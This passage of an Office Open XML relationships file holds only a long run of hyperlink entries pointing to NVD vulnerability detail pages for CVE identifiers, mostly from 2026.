Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50980" TargetMode="External" Id="rId829" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54687" TargetMode="External" Id="rId830" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55059" TargetMode="External" Id="rId831" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55530" TargetMode="External" Id="rId832" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75170" TargetMode="External" Id="rId833" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75307" TargetMode="External" Id="rId834" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75308" TargetMode="External" Id="rId835" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-7804" TargetMode="External" Id="rId836" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78377" TargetMode="External" Id="rId837" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79419" TargetMode="External" Id="rId838" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84369" TargetMode="External" Id="rId839" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86351" TargetMode="External" Id="rId840" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87640" TargetMode="External" Id="rId841" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-24225" TargetMode="External" Id="rId842" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-25250" TargetMode="External" Id="rId843" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47624" TargetMode="External" Id="rId844" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53508" TargetMode="External" Id="rId845" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21105" TargetMode="External" Id="rId846" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-32593" TargetMode="External" Id="rId847" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-32637" TargetMode="External" Id="rId848" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45404" TargetMode="External" Id="rId849" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67395" TargetMode="External" Id="rId850" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78483" TargetMode="External" Id="rId851" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78489" TargetMode="External" Id="rId852" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79962" TargetMode="External" Id="rId853" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79968" TargetMode="External" Id="rId854" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79969" TargetMode="External" Id="rId855" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80051" TargetMode="External" Id="rId856" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80341" TargetMode="External" Id="rId857" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81646" TargetMode="External" Id="rId858" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84363" TargetMode="External" Id="rId859" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84373" TargetMode="External" Id="rId860" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84378" TargetMode="External" Id="rId861" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87482" TargetMode="External" Id="rId862" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87590" TargetMode="External" Id="rId863" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87737" TargetMode="External" Id="rId864" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63381" TargetMode="External" Id="rId865" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69129" TargetMode="External" Id="rId866" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16180" TargetMode="External" Id="rId867" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53509" TargetMode="External" Id="rId868" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57825" TargetMode="External" Id="rId869" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63380" TargetMode="External" Id="rId870" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85788" TargetMode="External" Id="rId871" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55663" TargetMode="External" Id="rId872" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79730" TargetMode="External" Id="rId873" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79967" TargetMode="External" Id="rId874" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79970" TargetMode="External" Id="rId875" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84380" TargetMode="External" Id="rId876" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-51619" TargetMode="External" Id="rId877" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17440" TargetMode="External" Id="rId878" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17469" TargetMode="External" Id="rId879" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19649" TargetMode="External" Id="rId880" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20500" TargetMode="External" Id="rId881" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21099" TargetMode="External" Id="rId882" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-39020" TargetMode="External" Id="rId883" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49313" TargetMode="External" Id="rId884" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49831" TargetMode="External" Id="rId885" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49833" TargetMode="External" Id="rId886" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52772" TargetMode="External" Id="rId887" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59183" TargetMode="External" Id="rId888" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59983" TargetMode="External" Id="rId889" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59984" TargetMode="External" Id="rId890" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59985" TargetMode="External" Id="rId891" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61555" TargetMode="External" Id="rId892" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63004" TargetMode="External" Id="rId893" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68514" TargetMode="External" Id="rId894" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78487" TargetMode="External" Id="rId895" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79694" TargetMode="External" Id="rId896" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79945" TargetMode="External" Id="rId897" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79947" TargetMode="External" Id="rId898" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80124" TargetMode="External" Id="rId899" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86210" TargetMode="External" Id="rId900" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86222" TargetMode="External" Id="rId901" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86239" TargetMode="External" Id="rId902" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86260" TargetMode="External" Id="rId903" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86276" TargetMode="External" Id="rId904" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86292" TargetMode="External" Id="rId905" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86302" TargetMode="External" Id="rId906" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86308" TargetMode="External" Id="rId907" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86319" TargetMode="External" Id="rId908" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86423" TargetMode="External" Id="rId909" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86425" TargetMode="External" Id="rId910" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87552" TargetMode="External" Id="rId911" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87921" TargetMode="External" Id="rId912" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87922" TargetMode="External" Id="rId913" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87924" TargetMode="External" Id="rId914" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2022-26961" TargetMode="External" Id="rId915" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-11821" TargetMode="External" Id="rId916" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15460" TargetMode="External" Id="rId917" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17274" TargetMode="External" Id="rId918" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38725" TargetMode="External" Id="rId919" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38961" TargetMode="External" Id="rId920" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-40635" TargetMode="External" Id="rId921" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45694" TargetMode="External" Id="rId922" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53956" TargetMode="External" Id="rId923" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54256" TargetMode="External" Id="rId924" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54553" TargetMode="External" Id="rId925" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55779" TargetMode="External" Id="rId926" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56127" TargetMode="External" Id="rId927" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71802" TargetMode="External" Id="rId928" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71803" TargetMode="External" Id="rId929" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73254" TargetMode="External" Id="rId930" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73259" TargetMode="External" Id="rId931" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79640" TargetMode="External" Id="rId932" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81888" TargetMode="External" Id="rId933" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81890" TargetMode="External" Id="rId934" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84371" TargetMode="External" Id="rId935" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85133" TargetMode="External" Id="rId936" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85418" TargetMode="External" Id="rId937" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86440" TargetMode="External" Id="rId938" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87025" TargetMode="External" Id="rId939" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87033" TargetMode="External" Id="rId940" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87037" TargetMode="External" Id="rId941" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87048" TargetMode="External" Id="rId942" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87445" TargetMode="External" Id="rId943" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87458" TargetMode="External" Id="rId944" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87462" TargetMode="External" Id="rId945" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87484" TargetMode="External" Id="rId946" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87496" TargetMode="External" Id="rId947" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87501" TargetMode="External" Id="rId948" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87507" TargetMode="External" Id="rId949" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87540" TargetMode="External" Id="rId950" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87571" TargetMode="External" Id="rId951" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87575" TargetMode="External" Id="rId952" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87583" TargetMode="External" Id="rId953" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87599" TargetMode="External" Id="rId954" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87615" TargetMode="External" Id="rId955" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87635" TargetMode="External" Id="rId956" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87645" TargetMode="External" Id="rId957" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87649" TargetMode="External" Id="rId958" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87653" TargetMode="External" Id="rId959" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87655" TargetMode="External" Id="rId960" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87656" TargetMode="External" Id="rId961" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87928" TargetMode="External" Id="rId962" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2023-54394" TargetMode="External" Id="rId963" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2023-54395" TargetMode="External" Id="rId964" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12956" TargetMode="External" Id="rId965" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18042" TargetMode="External" Id="rId966" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19733" TargetMode="External" Id="rId967" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20503" TargetMode="External" Id="rId968" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20504" TargetMode="External" Id="rId969" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21092" TargetMode="External" Id="rId970" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27463" TargetMode="External" Id="rId971" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-37067" TargetMode="External" Id="rId972" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38819" TargetMode="External" Id="rId973" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50554" TargetMode="External" Id="rId974" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53497" TargetMode="External" Id="rId975" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53585" TargetMode="External" Id="rId976" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54048" TargetMode="External" Id="rId977" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54766" TargetMode="External" Id="rId978" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55419" TargetMode="External" Id="rId979" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55512" TargetMode="External" Id="rId980" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55619" TargetMode="External" Id="rId981" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55624" TargetMode="External" Id="rId982" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55867" TargetMode="External" Id="rId983" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63435" TargetMode="External" Id="rId984" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64857" TargetMode="External" Id="rId985" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73324" TargetMode="External" Id="rId986" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73474" TargetMode="External" Id="rId987" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73789" TargetMode="External" Id="rId988" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77310" TargetMode="External" Id="rId989" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77341" TargetMode="External" Id="rId990" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77507" TargetMode="External" Id="rId991" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79638" TargetMode="External" Id="rId992" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79741" TargetMode="External" Id="rId993" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79946" TargetMode="External" Id="rId994" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 